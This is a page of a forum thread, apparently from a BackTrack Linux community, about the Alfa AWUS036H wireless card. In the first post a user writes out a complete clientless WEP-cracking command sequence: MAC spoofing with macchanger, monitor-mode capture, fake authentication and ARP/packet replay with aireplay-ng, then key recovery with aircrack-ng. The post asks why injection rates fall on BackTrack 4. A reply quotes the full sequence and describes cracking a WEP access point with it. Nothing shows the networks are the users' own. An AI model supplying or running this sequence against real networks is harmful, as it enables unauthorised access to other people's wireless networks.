Page 2 of 2 FirstFirst 12
Results 11 to 12 of 12

Thread: Alpha AWUSO36H 1000mw?

  1. #11
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    18

    Default Re: Alpha AWUSO36H 1000mw?

    Right i just tested this method on BACKTRACK 3 and it works great!! at least 500ps data. why doesnt this method work with Backtrack 4? Data rate on backtrack 4 does not increase, only 1 or 2. Both ways where clientless using this same method.

    Can someone test this clientless method on BACKTRACK 4 using card stated aove and tell me if the data rate increases?

    airmon-ng stop wlan0

    ifconfig wlan0 down

    macchanger --mac 00:11:22:33:44:55 wlan0

    airmon-ng start wlan0

    airodump-ng wlan0

    airodump-ng -c (channel ap is on) -w test --bssid (bssid of AP) wlan0

    aireplay-ng -1 0 -a (bssid of Ap) -h 00:11:22:33:44:55 wlan0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid of Ap) -h 00:11:22:33:44:55 wlan0

    aircrack-ng test-01.cap

    cheers.

  2. #12
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    1

    Question Re: Alpha AWUSO36H 1000mw?

    Quote Originally Posted by brawngp View Post
    Right i just tested this method on BACKTRACK 3 and it works great!! at least 500ps data. why doesnt this method work with Backtrack 4? Data rate on backtrack 4 does not increase, only 1 or 2. Both ways where clientless using this same method.

    Can someone test this clientless method on BACKTRACK 4 using card stated aove and tell me if the data rate increases?

    airmon-ng stop wlan0

    ifconfig wlan0 down

    macchanger --mac 00:11:22:33:44:55 wlan0

    airmon-ng start wlan0

    airodump-ng wlan0

    airodump-ng -c (channel ap is on) -w test --bssid (bssid of AP) wlan0

    aireplay-ng -1 0 -a (bssid of Ap) -h 00:11:22:33:44:55 wlan0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid of Ap) -h 00:11:22:33:44:55 wlan0

    aircrack-ng test-01.cap

    cheers.



    I own a brand new 1W 36H and tried the commands that you listed on a WEP AP with no active clients.

    Previously, I was able to crack this AP using the 36H in mon mode while collecting IVs. It only took a couple of minutes.

    Using the 0841 and wlan0 for .cap method that you listed, I could not get a fake authentication .

    I tried the 0841 option using the enabled mon0 (it was enabled automatically after the "airmon-ng start wlan0") instead of wlan0, at that point, .

    I generated a fake authentication, then a packet for injection. This process still did not increase the #/s


    What is the benefit of the -p 0841 option in aireplay-ng?

    Is this "interactive frame selection" ?

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •